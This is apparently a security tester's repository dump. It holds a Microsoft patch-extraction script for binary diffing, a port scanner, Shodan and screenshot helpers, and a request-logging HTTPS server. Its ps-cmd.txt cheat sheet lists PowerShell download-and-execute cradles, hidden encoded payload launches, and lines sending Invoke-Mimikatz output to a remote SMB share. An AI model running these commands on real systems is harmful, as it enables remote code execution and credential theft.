[DEFAULT='JUNK'] 125 | 126 | Specifies the folder name within $PATH to store resource, catalog, and other generally useless for diffing patch binaries 127 | example: -JUNK res 128 | 129 | 130 | -BIN [OPTIONAL] [DEFAULT='PATCH'] 131 | 132 | Specifies the folder name within $PATH to store extraction xml and original patch msu and cab files 133 | example: -BIN bin 134 | 135 | 136 | ================ 137 | VERSION HISTORY 138 | ================ 139 | I originally wrote this as an ugly batch file sometime between 2014 and 2015 as a way to organize folders but it was incomplete and buggy 140 | 141 | Oct 15, 2015 - Initial Public Release 1.0 142 | Oct 20, 2016 - Version 1.1 Released 143 | * Bug fixes handling new naming format for patch .cab files 144 | * Added the ability to auto-extract to the same directory as current PATCH 145 | * filtered output directory name format to aid in bindiffing 146 | 147 | Oct 20, 2016 - Version 1.2 Released 148 | * Bug fixes handling MSIL renaming issues and collisions in renameing patch folders 149 | 150 | Nov 7, 2016 - Version 1.25 Released 151 | * Added hack to handle subsequent CAB files Microsoft Added in Windows 10 Cumulative Patches - will make a better way to handle this in 1.3 152 | 153 | March 15, 2017 - Version 1.3 Released 154 | * Color Change to sweet vaporwave retro 80s colors 155 | * Cleaned up some awful code that I must have been on some amazing substances when I wrote 156 | * Spent several hours making a rad ASCII Logo 157 | * Most importantly fixed the Sub-cab auto-extraction method that Microsoft introduced late 2016 158 | 159 | 160 | 161 | ========== 162 | LICENSING 163 | ========== 164 | This script is provided free as beer. It probably has some bugs and coding issues, however if you like it or find it useful please give me a shout out on twitter @Laughing_Mantis. 165 | Feedback is encouraged and I will be likely releasing new scripts and tools and training in the future if it is welcome. 166 | 167 | 168 | -GLin 169 | 170 | #> 171 | 172 | 173 | 174 | 175 | Param 176 | ( 177 | 178 | [Parameter(ValueFromPipelineByPropertyName = $true)] 179 | [ValidateNotNullOrEmpty()] 180 | [string]$PATCH = "", 181 | 182 | [Parameter(ValueFromPipelineByPropertyName = $true)] 183 | [string]$PATH = "", 184 | 185 | [Parameter(ValueFromPipelineByPropertyName = $true)] 186 | [string]$x86 = "x86", 187 | 188 | [Parameter(ValueFromPipelineByPropertyName = $true)] 189 | [string]$x64 = "x64", 190 | 191 | [Parameter(ValueFromPipelineByPropertyName = $true)] 192 | [string]$WOW = "WOW64", 193 | 194 | [Parameter(ValueFromPipelineByPropertyName = $true)] 195 | [string]$MSIL = "MSIL", 196 | 197 | [Parameter(ValueFromPipelineByPropertyName = $true)] 198 | [string]$JUNK = "JUNK", 199 | 200 | [Parameter(ValueFromPipelineByPropertyName = $true)] 201 | [string]$BIN = "PATCH" 202 | 203 | ) 204 | 205 | Clear-Host 206 | $ASCIIART = @" 207 | ____ ______ ______ ____ __ __ 208 | /\ _`\ /\ _ \ /\__ _\/\ _`\ /\ \/\ \ 209 | \ \ \L\ \\ \ \L\ \\/_/\ \/\ \ \/\_\\ \ \_\ \ 210 | \ \ ,__/ \ \ __ \ \ \ \ \ \ \/_/_\ \ _ \ 211 | \ \ \/ \ \ \/\ \ \ \ \ \ \ \L\ \\ \ \ \ \ 212 | \ \_\ \ \_\ \_\ \ \_\ \ \____/ \ \_\ \_\ 213 | \/_/ \/_/\/_/ \/_/ \/___/ \/_/\/_/ 214 | 215 | 216 | ____ __ __ ______ ____ ______ ____ ______ 217 | /\ _`\ /\ \ /\ \ /\__ _\/\ _`\ /\ _ \ /\ _`\ /\__ _\ 218 | \ \ \L\_\\ `\`\/'/'\/_/\ \/\ \ \L\ \\ \ \L\ \\ \ \/\_\\/_/\ \/ 219 | \ \ _\L `\/ > < \ \ \ \ \ , / \ \ __ \\ \ \/_/_ \ \ \ 220 | \ \ \L\ \ \/'/\`\ \ \ \ \ \ \\ \ \ \ \/\ \\ \ \L\ \ \ \ \ 221 | \ \____/ /\_\\ \_\ \ \_\ \ \_\ \_\\ \_\ \_\\ \____/ \ \_\ 222 | \/___/ \/_/ \/_/ \/_/ \/_/\/ / \/_/\/_/ \/___/ \/_/ 223 | 224 | 225 | __ __ _ __ 226 | /\ \/\ \ /' \ /'__`\ 227 | \ \ \ \ \ /\_, \ /\_\L\ \ 228 | \ \ \ \ \\/_/\ \ \/_/_\_<_ 229 | \ \ \_/ \ \ \ \ __ /\ \L\ \ 230 | \ `\___/ \ \_\/\_\\ \____/ 231 | `\/__/ \/_/\/_/ \/___/ 232 | "@ 233 | 234 | Write-Host $ASCIIART -ForegroundColor Magenta 235 | Start-Sleep -s 3 236 | 237 | 238 | if ($PATCH -eq "") 239 | { 240 | Throw ("Error: No PATCH file specified. Specify a valid Microsoft MSU Patch with the -PATCH argument") 241 | 242 | } 243 | 244 | if ((Split-Path $PATCH -Parent) -eq "") 245 | { 246 | # First look in current working directory for the relative filename 247 | $CurrentDir = $(get-location).Path; 248 | $PATCH = $CurrentDir + "\" + $PATCH 249 | 250 | # if that doesnt work we look in the current script directory (less likely) 251 | # but hey we tried 252 | if (!(Test-Path $PATCH)) 253 | { 254 | $scriptDir = Split-Path -Path $MyInvocation.MyCommand.Definition -Parent 255 | $PATCH = $scriptDir + "\" + $PATCH 256 | } 257 | } 258 | 259 | if (!(Test-Path $PATCH)) 260 | { 261 | Throw ("Error: Specified PATCH file ($PATCH) does not exist. Specify a valid Microsoft MSU Patch file with the -PATCH argument.") 262 | } 263 | 264 | if ($PATH -eq "") 265 | { 266 | $PATH = Split-Path $PATCH -Parent 267 | write-Host ("PATH = $PATH") -ForegroundColor White 268 | Write-Host ("No PATH folder specified. Will extract to $PATH folder.") -ForegroundColor White 269 | 270 | } 271 | 272 | #Bug Fix (Resolve-Path Error if invalid path was specified before the path was created) 273 | 274 | 275 | 276 | 277 | if (!($PATCH.ToUpper().EndsWith(".MSU"))) 278 | { 279 | Do 280 | { 281 | $Attempt = Read-Host ("Warning: Specified PATCH file ($PATCH) is not a MSU file type. Do you still want to attempt extraction? [Y] or [N]") 282 | } 283 | Until ('Y', 'y', 'n', 'N' -ccontains $Attempt) 284 | if ($Attempt.ToUpper() -eq 'N') 285 | { 286 | Write-Host ("Exiting...") -ForegroundColor DarkMagenta 287 | Exit 288 | } 289 | } 290 | 291 | if (!(Test-Path $PATH)) 292 | { 293 | Do 294 | { 295 | $Attempt = Read-Host ("Warning: Specified PATH folder ($PATH) does not exist. Do you want to create it? [Y] or [N]") 296 | } 297 | Until ('Y', 'y', 'n', 'N' -ccontains $Attempt) 298 | if ($Attempt.ToUpper() -eq 'N') 299 | { 300 | Write-Host ("Exiting...") -ForegroundColor DarkMagenta 301 | Exit 302 | } 303 | else 304 | { 305 | New-Item $PATH -Force -ItemType Directory 306 | Write-Host "Created $PATH Folder" -ForegroundColor Cyan 307 | } 308 | } 309 | 310 | $PATCH = Resolve-Path $PATCH 311 | $PATH = Resolve-Path $PATH 312 | 313 | Write-Host "Patch to Extract: $PATCH" -ForegroundColor Magenta 314 | Write-Host "Extraction Path: $PATH" -ForegroundColor Magenta 315 | Write-Host "x86 File Storage Folder Name: $x86" -ForegroundColor Magenta 316 | Write-Host "x64 File Storage Folder Name: $x64" -ForegroundColor Magenta 317 | Write-Host "WOW64 File Storage Folder Name: $WOW" -ForegroundColor Magenta 318 | Write-Host "MSIL File Storage Folder Name: $MSIL" -ForegroundColor Magenta 319 | Write-Host "Junk File Storage Folder Name: $JUNK" -ForegroundColor Magenta 320 | Write-Host "Orignal Patch File Storage Folder Name: $BIN" -ForegroundColor Magenta 321 | 322 | 323 | 324 | $PATCHx86 = Join-Path -path $PATH -ChildPath $x86 325 | $PATCHx64 = Join-Path -path $PATH -ChildPath $x64 326 | $PATCHWOW = Join-Path -path $PATH -ChildPath $WOW 327 | $PATCHMSIL = Join-Path -path $PATH -ChildPath $MSIL 328 | $PATCHJUNK = Join-Path -path $PATH -ChildPath $JUNK 329 | $PATCHCAB = Join-Path -path $PATH -ChildPath $BIN 330 | 331 | 332 | if (!(Test-Path $PATCHx86 -pathType Container)) 333 | { 334 | New-Item $PATCHx86 -Force -ItemType Directory 335 | Write-Host "Making $PATCHx86 Folder" -ForegroundColor Cyan 336 | } 337 | 338 | if (!(Test-Path $PATCHx64 -pathType Container)) 339 | { 340 | New-Item $PATCHx64 -Force -ItemType Directory 341 | Write-Host "Making $PATCHx64 Folder" -ForegroundColor Cyan 342 | } 343 | 344 | if (!(Test-Path $PATCHWOW -pathType Container)) 345 | { 346 | New-Item $PATCHWOW -Force -ItemType Directory 347 | Write-Host "Making $PATCHWOW Folder" -ForegroundColor Cyan 348 | } 349 | 350 | if (!(Test-Path $PATCHMSIL -pathType Container)) 351 | { 352 | New-Item $PATCHMSIL -Force -ItemType Directory 353 | Write-Host "Making $PATCHMSIL Folder" -ForegroundColor Cyan 354 | } 355 | 356 | if (!(Test-Path $PATCHJUNK -pathType Container)) 357 | { 358 | New-Item $PATCHJUNK -Force -ItemType Directory 359 | Write-Host "Making $PATCHJUNK Folder" -ForegroundColor Cyan 360 | } 361 | 362 | if (!(Test-Path $PATCHCAB -pathType Container)) 363 | { 364 | New-Item $PATCHCAB -Force -ItemType Directory 365 | Write-Host "Making $PATCHCAB Folder" -ForegroundColor Cyan 366 | } 367 | 368 | 369 | $SYSPATH = Join-Path -path (get-item env:\windir).Value -ChildPath "system32" 370 | 371 | $EXPAND = Join-Path -path $SYSPATH -ChildPath "expand.exe" 372 | 373 | 374 | if (!(Test-Path $EXPAND)) 375 | { 376 | Throw ("Error: Cannot find 'Expand.exe' in the $SYSPATH folder.") 377 | } 378 | 379 | $ARG = '-F:* ' + '"' + $PATCH + '" ' + '"' + $PATH + '"' 380 | 381 | Write-Host "Executing the following command: $EXPAND $ARG" -ForegroundColor Cyan 382 | 383 | Start-Process -File $EXPAND -ArgumentList $ARG -Wait 384 | 385 | 386 | 387 | $CABS = Get-Childitem -Path $PATH -Filter *.cab 388 | foreach ($CAB in $CABS) 389 | { 390 | Write-Host "CAB File: $CAB" -ForegroundColor White 391 | if (!($CAB.Name -eq "WSUSSCAN.cab")) 392 | { 393 | $CAB = Join-Path -path $PATH -ChildPath $CAB 394 | Write-Host "Main-Cab: $CAB" -ForegroundColor Magenta 395 | if (Test-Path $CAB) 396 | { 397 | $ARG = '-F:* ' + '"' + $CAB + '" ' + '"' + $PATH + '"' 398 | Write-Host "Executing the following command: $EXPAND $ARG" -ForegroundColor Cyan 399 | Start-Process -File $EXPAND -ArgumentList $ARG -Wait 400 | Write-Host "Moving $CAB to $PATCHCAB" -ForegroundColor Magenta 401 | Move-Item $CAB $PATCHCAB -Force -ErrorAction SilentlyContinue 402 | } 403 | else 404 | { 405 | Throw "Error: Patch .CAB File [$CAB] could not be located. Patch Extraction failed - please send notification of this error to @Laughing_Mantis." 406 | } 407 | } 408 | else 409 | { 410 | Write-Host "Moving $CAB to $PATCHCAB" -ForegroundColor Magenta 411 | Move-Item $CAB $PATCHCAB -Force -ErrorAction SilentlyContinue 412 | } 413 | } 414 | 415 | #Now for subcabs we do it again 416 | $CABS = Get-Childitem -Path $PATH -Filter *.cab 417 | foreach ($CAB in $CABS) 418 | { 419 | if (!($CAB.Name -eq "WSUSSCAN.cab")) 420 | { 421 | $CAB = Join-Path -path $PATH -ChildPath $CAB 422 | Write-Host "Sub-Cab: $CAB" -ForegroundColor Magenta 423 | if (Test-Path $CAB) 424 | { 425 | $ARG = '-F:* ' + '"' + $CAB + '" ' + '"' + $PATH + '"' 426 | Write-Host "Executing the following command: $EXPAND $ARG" -ForegroundColor Cyan 427 | Start-Process -File $EXPAND -ArgumentList $ARG -Wait 428 | Write-Host "Moving $CAB to $PATCHCAB" -ForegroundColor Magenta 429 | Move-Item $CAB $PATCHCAB -Force -ErrorAction SilentlyContinue 430 | } 431 | else 432 | { 433 | Throw "Error: Patch .CAB File [$CAB] could not be located. Patch Extraction failed - please send notification of this error to @Laughing_Mantis." 434 | } 435 | } 436 | } 437 | 438 | 439 | <# Microsoft newer patches do not follow this formula - likely an attempt to prevent 440 | auto extraction so we need to handle scenarios where patch cab does not have the same 441 | name as the container MSP #> 442 | 443 | 444 | 445 | 446 | 447 | <# Nov 7th, 2016 - Looks like Microsoft does not like my tool and added new sub-CABs to make automagic patch extraction not work. 448 | Adding an additional check to look for sub-CABs incase this becomes the new normal. 449 | This is an absolute hack that will likely be bypassed next month. 450 | #> 451 | 452 | 453 | 454 | <# 1.3 Fix - Microsoft likes to put multiple .Cabs in a single MSU now.... 455 | So we will look in the extracted contents and run extract on ALL cabs found 456 | except for WSUSSCAN.cab - I feel like Microsoft might put specific patches in 457 | sub cabs that might cause extracted files to overwrite each other - ie 458 | cab 1 might have binaries for specific build while cab 2 has same binary/folder name for 459 | different build...fingers crossed this doesnt happen 460 | Also Greetz to all the Microsoft Patch Team members 461 | #> 462 | 463 | ### I must have been on some amazing substances when i wrote this next part.....utterly ridiculous 464 | ### yeah this is garbage let me rewrite this for 1.3 465 | 466 | <# GARBAGE CODE BELOW SAVED FOR SHAMING PURPOSES 467 | $patchCABID = "cab_" + $patchCAB + "_*.cab" 468 | $CAB = (Get-ChildItem -Path $PATH -Filter $PatchCABID | Select-Object -First 1) 469 | Write-Host "Debug CAB = $CAB" 470 | if (Test-Path $CAB) 471 | { 472 | $flag = "1" 473 | } 474 | 475 | while ($flag -eq "1") 476 | { 477 | Write-Host "Subsequent CAB $CAB detected - attempting beta extraction" -ForegroundColor Yellow 478 | $ARG = '-F:* ' + '"' + $CAB + '" ' + '"' + $PATH + '"' 479 | 480 | Write-Host "Executing the following command: $EXPAND $ARG" -ForegroundColor Cyan 481 | 482 | Start-Process -File $EXPAND -ArgumentList $ARG -Wait 483 | 484 | $patchCAB++ 485 | 486 | $patchCABID = "cab_" + $patchCAB + "_*.cab" 487 | try 488 | { 489 | $CAB = (Get-ChildItem -Path $PATH -Filter $PatchCABID | Select-Object -First 1) 490 | if ((!(Test-Path $CAB)) -or ($CAB -eq "")) 491 | { 492 | $flag = "0" 493 | } 494 | } 495 | catch 496 | { 497 | $flag = "0" 498 | } 499 | 500 | } 501 | #> 502 | 503 | 504 | 505 | $PATCHFolders = Get-ChildItem -Path $PATH -Force -ErrorAction SilentlyContinue | where {$_.Attributes -eq 'Directory'} 506 | 507 | foreach ($folder in $PATCHFolders) 508 | { 509 | if ($folder.Name.Contains(".resources_")) 510 | { 511 | Move-Item $folder.FullName $PATCHJUNK -Force 512 | Write-Host "Moving $folder to $PATCHJUNK" -ForegroundColor Cyan 513 | Continue 514 | } 515 | else 516 | { 517 | if ($folder.Name.StartsWith("x86_")) 518 | { 519 | Move-Item $folder.FullName $PATCHx86 -Force 520 | Write-Host "Moving $folder to $PATCHx86" -ForegroundColor Cyan 521 | Continue 522 | } 523 | 524 | if ($folder.Name.StartsWith("amd64_")) 525 | { 526 | Move-Item $folder.FullName $PATCHx64 -Force 527 | Write-Host "Moving $folder to $PATCHx64" -ForegroundColor Cyan 528 | Continue 529 | } 530 | 531 | if ($folder.Name.StartsWith("wow64_")) 532 | { 533 | Move-Item $folder.FullName $PATCHWOW -Force 534 | Write-Host "Moving $folder to $PATCHWOW" -ForegroundColor Cyan 535 | Continue 536 | } 537 | 538 | if ($folder.Name.StartsWith("msil_")) 539 | { 540 | Move-Item $folder.FullName $PATCHMSIL -Force 541 | Write-Host "Moving $folder to $PATCHMSIL" -ForegroundColor Cyan 542 | Continue 543 | } 544 | } 545 | } 546 | 547 | <# PRETTY BINDIFF OUTPUT - changes folder names from x86-microsoft-windows-filename-hash-version-garbage to filename-version #> 548 | 549 | $PATCHFolders = Get-ChildItem -Path $PATCHx86 -Force -ErrorAction SilentlyContinue | where {$_.Attributes -eq 'Directory'} 550 | 551 | foreach ($folder in $PATCHFolders) 552 | { 553 | if ($folder -like "x86_microsoft-windows-*") 554 | { 555 | $newfolder = $folder.Name.Replace("x86_microsoft-windows-", "") 556 | $newname = $newfolder.Split("_")[0] 557 | $version = $newfolder.Split("_")[2] 558 | $newname = $newname + "_" + $version 559 | Write-Host ("Renaming $folder to $newname") -ForegroundColor Magenta 560 | Rename-Item -path $folder.FullName -newName ($newname) 561 | } 562 | elseif ($folder -like "x86_*") 563 | { 564 | $newfolder = $folder.Name.Replace("x86_", "") 565 | $newname = $newfolder.Split("_")[0] 566 | $version = $newfolder.Split("_")[2] 567 | $newname = $newname + "_" + $version 568 | Write-Host ("Renaming $folder to $newname") -ForegroundColor Cyan 569 | Rename-Item -path $folder.FullName -newName ($newname) 570 | } 571 | } 572 | 573 | $PATCHFolders = Get-ChildItem -Path $PATCHx64 -Force -ErrorAction SilentlyContinue | where {$_.Attributes -eq 'Directory'} 574 | 575 | foreach ($folder in $PATCHFolders) 576 | { 577 | if ($folder -like "amd64_microsoft-windows-*") 578 | { 579 | $newfolder = $folder.Name.Replace("amd64_microsoft-windows-", "") 580 | $newname = $newfolder.Split("_")[0] 581 | $version = $newfolder.Split("_")[2] 582 | $newname = $newname + "_" + $version 583 | Write-Host ("Renaming $folder to $newname") -ForegroundColor Magenta 584 | Rename-Item -path $folder.FullName -newName ($newname) 585 | } 586 | elseif ($folder -like "amd64_*") 587 | { 588 | $newfolder = $folder.Name.Replace("amd64_", "") 589 | $newname = $newfolder.Split("_")[0] 590 | $version = $newfolder.Split("_")[2] 591 | $newname = $newname + "_" + $version 592 | Write-Host ("Renaming $folder to $newname") -ForegroundColor Cyan 593 | Rename-Item -path $folder.FullName -newName ($newname) 594 | } 595 | } 596 | 597 | $PATCHFolders = Get-ChildItem -Path $PATCHWOW -Force -ErrorAction SilentlyContinue | where {$_.Attributes -eq 'Directory'} 598 | 599 | foreach ($folder in $PATCHFolders) 600 | { 601 | if ($folder -like "wow64_microsoft-windows-*") 602 | { 603 | $newfolder = $folder.Name.Replace("wow64_microsoft-windows-", "") 604 | $newname = $newfolder.Split("_")[0] 605 | $version = $newfolder.Split("_")[2] 606 | $newname = $newname + "_" + $version 607 | Write-Host ("Renaming $folder to $newname") -ForegroundColor Magenta 608 | Rename-Item -path $folder.FullName -newName ($newname) 609 | } 610 | elseif ($folder -like "wow64_*") 611 | { 612 | $newfolder = $folder.Name.Replace("wow64_", "") 613 | $newname = $newfolder.Split("_")[0] 614 | $version = $newfolder.Split("_")[2] 615 | $newname = $newname + "_" + $version 616 | Write-Host ("Renaming $folder to $newname") -ForegroundColor Cyan 617 | Rename-Item -path $folder.FullName -newName ($newname) 618 | } 619 | } 620 | 621 | $PATCHFolders = Get-ChildItem -Path $PATCHMSIL -Force -ErrorAction SilentlyContinue | where {$_.Attributes -eq 'Directory'} 622 | 623 | foreach ($folder in $PATCHFolders) 624 | { 625 | if ($folder -like "msil_*") 626 | { 627 | $newfolder = $folder.Name.Replace("msil_", "") 628 | $newname = $newfolder.Split("_")[0] 629 | $version = $newfolder.Split("_")[2] 630 | $newname = $newname + "_" + $version 631 | Write-Host ("Renaming $folder to $newname") -ForegroundColor Cyan 632 | Rename-Item -path $folder.FullName -newName ($newname) 633 | } 634 | 635 | } 636 | 637 | $Junkfiles = Get-ChildItem -Path $PATH -Force -ErrorAction SilentlyContinue 638 | 639 | 640 | foreach ($JunkFile in $Junkfiles) 641 | { 642 | 643 | try 644 | { 645 | if (($JunkFile.Name.EndsWith(".manifest")) -or ($JunkFile.Name.EndsWith(".cat")) -or ($JunkFile.Name.EndsWith(".mum"))) 646 | { 647 | Move-Item $JunkFile.FullName $PATCHJUNK -Force -ErrorAction SilentlyContinue 648 | Write-Host "Moving $JunkFile to $PATCHJUNK" -ForegroundColor Magenta 649 | Continue 650 | } 651 | 652 | if (($JunkFile.Name.EndsWith(".cab")) -or ($JunkFile.Name.EndsWith(".xml")) -or ($JunkFile.Name.EndsWith(".msu")) -or ($JunkFile.Name.EndsWith("pkgProperties.txt"))) 653 | { 654 | Move-Item $JunkFile.FullName $PATCHCAB -Force -ErrorAction SilentlyContinue 655 | Write-Host "Moving $JunkFile to $PATCHCAB" -ForegroundColor Cyan 656 | Continue 657 | } 658 | if ($JunkFile.Name -eq "patch") 659 | { 660 | Move-Item $JunkFile.FullName $PATCHCAB -Force -ErrorAction SilentlyContinue 661 | Write-Host "Moving $JunkFile to $PATCHCAB" -ForegroundColor Magenta 662 | Continue 663 | } 664 | } 665 | catch 666 | { 667 | Write-Host "Error Processing ($JunkFile.Fullname)" -ForegroundColor DarkMagenta 668 | } 669 | } 670 | -------------------------------------------------------------------------------- /port_response_time.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Usage: python port_response_time.py 4 | #Example: python port_response_time.py 192.168.1.1 1-65535 10 3 10 port_res_time.out 5 | 6 | """ 7 | target_ip : IP Address to scan 8 | port_range : Port range to scan 9 | block_size : Number of blocks of ports to create to be scanned by a process 10 | connection_timeout : Timeout the connection after N seconds 11 | spaw_processes : Number of processes to create for scanning 12 | output_filename : File name to save output 13 | """ 14 | 15 | #Author: Interference Security 16 | 17 | import socket 18 | import sys 19 | from datetime import datetime 20 | from multiprocessing import Pool 21 | 22 | script_start = datetime.now() 23 | if len(sys.argv)!=7: 24 | print "Usage: "+sys.argv[0]+" " 25 | exit(0) 26 | 27 | target_ip = sys.argv[1] 28 | target_port_range = sys.argv[2].split("-") 29 | block_size = int(sys.argv[3]) 30 | con_timeout = int(sys.argv[4]) 31 | proc_count = int(sys.argv[5]) 32 | out_file = sys.argv[6] 33 | 34 | start_port = int(target_port_range[0]) 35 | end_port = int(target_port_range[1]) 36 | 37 | def checker(t_ip, t_port_start, t_port_end): 38 | res = "" 39 | for target_port in range(int(t_port_start),int(t_port_end)+1): 40 | try: 41 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | sock.settimeout(con_timeout) 43 | start_time = datetime.now() 44 | sock.connect((t_ip, int(target_port))) 45 | sock.send("test") 46 | end_time = datetime.now() 47 | diff_time = end_time - start_time 48 | res += target_ip+","+str(target_port)+","+str(diff_time.microseconds)+"\n" 49 | #print("[*] %s:%s:%s"%(target_ip, target_port, diff_time.microseconds)) 50 | except Exception,e: 51 | res += target_ip+","+str(target_port)+",Error-"+str(e)+"\n" 52 | #print("[!] %s:%s:%s"%(target_ip,target_port,"Error-"+str(e))) 53 | return res 54 | 55 | pool = Pool(processes=proc_count) 56 | results = [] 57 | for i in range(start_port, end_port, block_size): 58 | sp = i 59 | ep = sp + block_size -1 60 | if ep < end_port: 61 | results.append(pool.apply_async(checker, args=(target_ip,sp,ep,))) 62 | else: 63 | results.append(pool.apply_async(checker, args=(target_ip,sp,end_port,))) 64 | #results.append(pool.apply_async(checker, args=(target_ip,1,10,))) 65 | #results.append(pool.apply_async(checker, args=(target_ip,11,20,))) 66 | #results.append(pool.apply_async(checker, args=(target_ip,21,30,))) 67 | #results.append(pool.apply_async(checker, args=(target_ip,31,40,))) 68 | #results.append(pool.apply_async(checker, args=(target_ip,41,50,))) 69 | f = open(out_file, "w") 70 | for p in results: 71 | data = p.get() 72 | f.write(data) 73 | print data 74 | script_end=datetime.now() 75 | print "Total time: "+str(script_end - script_start) -------------------------------------------------------------------------------- /ps-cmd.txt: -------------------------------------------------------------------------------- 1 | IEX (New-Object Net.WebClient).DownloadString("http:///full_path/script_name.ps1") 2 | 3 | powershell -ExecutionPolicy Bypass file.ps1 4 | 5 | . .\file.ps1 6 | 7 | powershell.exe -NoP -sta -NonI -W Hidden -Enc ENCODED_BASE64_PAYLOAD 8 | 9 | String to Bytes to Base64: 10 | [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('IEX (New-Object Net.WebClient).DownloadString("http://127.0.0.1:8000/")')) 11 | 12 | Run a domain command from a non-domain computer: 13 | runas /netonly /user:\ powershell.exe 14 | 15 | Execute ShellCode Via InstallUtil x86: https://gist.github.com/interference-security/117dd7a820380b0af13b9ecb8f21ff0c (Dead link: https://gist.github.com/subTee/408d980d88515a539672) 16 | Execute ShellCode Via InstallUtil x64: Looking for a trusted fork (Dead link: https://gist.github.com/subTee/a06d4ae23e2517566c52) 17 | https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md 18 | 19 | Mimikatz in JS: https://gist.github.com/interference-security/276c4b0e9ed53a82b5c4958b4a708023 (Dead link: https://gist.github.com/subTee/b30e0bcc7645c790fcd993cfd0ad622f) 20 | 21 | SMB Shares on a list of IPs: 22 | $UserName = "Domain_here\Username_here" ; $sec_password = "password_here" ; $Credentials = New-Object System.Management.Automation.PSCredential -ArgumentList $UserName, $sec_password ; get-content .\ip.txt | foreach-object { Write-Host "[*] $_" ; Get-WmiObject -class win32_share -credential $Credentials -ComputerName $_ } 23 | 24 | SMB Shares on a single IP: 25 | $UserName = "USERNAME_HERE" ; $sec_password = "PASSWORD_HERE" ; $Credentials = New-Object System.Management.Automation.PSCredential -ArgumentList $UserName, $sec_password ; Get-WmiObject -class win32_share -credential $Credentials -ComputerName "YOUR_IP_HERE" 26 | 27 | Powershell remote session: 28 | Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" -Force 29 | $cred=Get-Credential "$env:USERDOMAIN\$env:USERNAME" 30 | Enter-PSSession -ComputerName 192.168.1.2 -Credential $cred 31 | 32 | Powershell output to SMB share: 33 | #script content here 34 | $A = function_name_for_above_script_here #example: invoke-mimikatz 35 | Out-File -FilePath \\IP_ADDR_HERE\guest_writable_smb_share_name_here\output_filename_here.txt -InputObject $A -Encoding ASCII 36 | 37 | Powershell Get-ADUser Input File and List: 38 | $users = Get-Content "C:\temp\user_list.txt" 39 | $users = "Fname1 Lname1","Fname2 Lname2","Fname3 Lname3" 40 | $out = Foreach ($user in $users) { Get-ADuser -Filter { displayname -eq $user } -Properties * | select name,mail,samaccountname }; $out | out-gridview 41 | -------------------------------------------------------------------------------- /quick-one-liners.md: -------------------------------------------------------------------------------- 1 | # Quick One Liners 2 | -------------------------------------------------------------------------------- /shodan_ip_port_info.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Usage: python shodan_ip_port_info.py 4 | #Example: python shodan_ip_port_info.py ip_list.lst output.out 5 | 6 | #Note: As on 27-02-2016 this command "shodan host " does not use Shodan API and does not consume your credits 7 | 8 | #Author: Interference Security 9 | 10 | import sys 11 | from subprocess import check_output 12 | 13 | o = open(sys.argv[1], "r") 14 | data = o.readlines() 15 | for ipaddr in data: 16 | ipaddr = (ipaddr.replace("\n","")).replace("\r","") 17 | try: 18 | out = check_output(["shodan", "host", ipaddr]) 19 | f = open(sys.argv[2], "a") 20 | f.write(out) 21 | f.write("\n") 22 | print out 23 | f.close() 24 | except: 25 | pass 26 | -------------------------------------------------------------------------------- /simple-https-server.py: -------------------------------------------------------------------------------- 1 | #openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes 2 | import BaseHTTPServer, SimpleHTTPServer, logging 3 | import ssl 4 | import sys 5 | import cgi 6 | 7 | class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): 8 | 9 | def do_GET(self): 10 | #logging.error(self.headers) 11 | #for item in dir(self): 12 | # try: 13 | # print "[*] "+item 14 | # logging.error(self.item) 15 | # except Exception as e: 16 | # print str(e) 17 | #request_path = self.path 18 | raw_request_line = self.raw_requestline 19 | #print dir(self) 20 | #import pdb; pdb.set_trace() 21 | print "\n----- Request Start ----->" 22 | print raw_request_line 23 | print self.headers 24 | print "<----- Request End ----->" 25 | SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self) 26 | 27 | def do_POST(self): 28 | #logging.error(self.headers) 29 | #form = cgi.FieldStorage(fp=self.rfile, headers=self.headers, environ={'REQUEST_METHOD':'POST', 'CONTENT_TYPE':self.headers['Content-Type'], }) 30 | #for item in form.list: 31 | # logging.error(item) 32 | request_path = self.path 33 | raw_request_line = self.raw_requestline 34 | print "\n----- Request Start ----->" 35 | print raw_request_line 36 | print self.headers 37 | print "<----- Request End ----->" 38 | print "<----- Request Body Start ----->" 39 | print self.rfile.readlines() 40 | print "<----- Request Body End ----->" 41 | SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self) 42 | 43 | do_PUT = do_POST 44 | 45 | Handler = GetHandler 46 | listen_ip = sys.argv[1] 47 | listen_port = int(sys.argv[2]) 48 | httpd = BaseHTTPServer.HTTPServer((listen_ip, listen_port), Handler) 49 | print "[*] Listening on %s on port %s" % (listen_ip, listen_port) 50 | httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) 51 | httpd.serve_forever() 52 | -------------------------------------------------------------------------------- /web_capture.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | # Takes screenshot of a web page using selenium 4 | 5 | # Usage 1: 6 | # File containing line separated URLs: 7 | # python web_capture.py url_file.txt 8 | 9 | # Usage 2: 10 | # List of URLs hardcoded in "urls = []" 11 | # Example: urls = ["http://127.0.0.1","https://127.0.0.1"] 12 | 13 | # one line code 14 | # python -c "from selenium import webdriver; driver = webdriver.Firefox(); driver.get('http://127.0.0.1'); driver.save_screenshot('capture.png'); driver.quit()" 15 | 16 | try: 17 | import sys 18 | from selenium import webdriver 19 | except: 20 | print "[!] You should have selenium installed. Run: pip install selenium" 21 | sys.exit(1) 22 | 23 | urls = [] 24 | if len(sys.argv)>=2: 25 | f = open(sys.argv[1], "r") 26 | data = f.readlines() 27 | del urls[:] 28 | for test_url in data: 29 | test_url = (test_url.replace("\r","")).replace("\n","") 30 | urls.append(test_url) 31 | 32 | #https://github.com/ariya/phantomjs 33 | #driver = webdriver.PhantomJS("/path/to/phantomjs/binary/file") 34 | 35 | #https://sites.google.com/a/chromium.org/chromedriver/downloads 36 | #driver = webdriver.Chrome("/path/to/chromedriver/binary/file") 37 | 38 | driver = webdriver.Firefox() 39 | count = 0; 40 | for myurl in urls: 41 | driver.get(myurl) 42 | driver.save_screenshot(str(count)+'.png') 43 | count = count + 1 44 | driver.quit() 45 | -------------------------------------------------------------------------------- /webshell/mysql-cmd-upload.php: 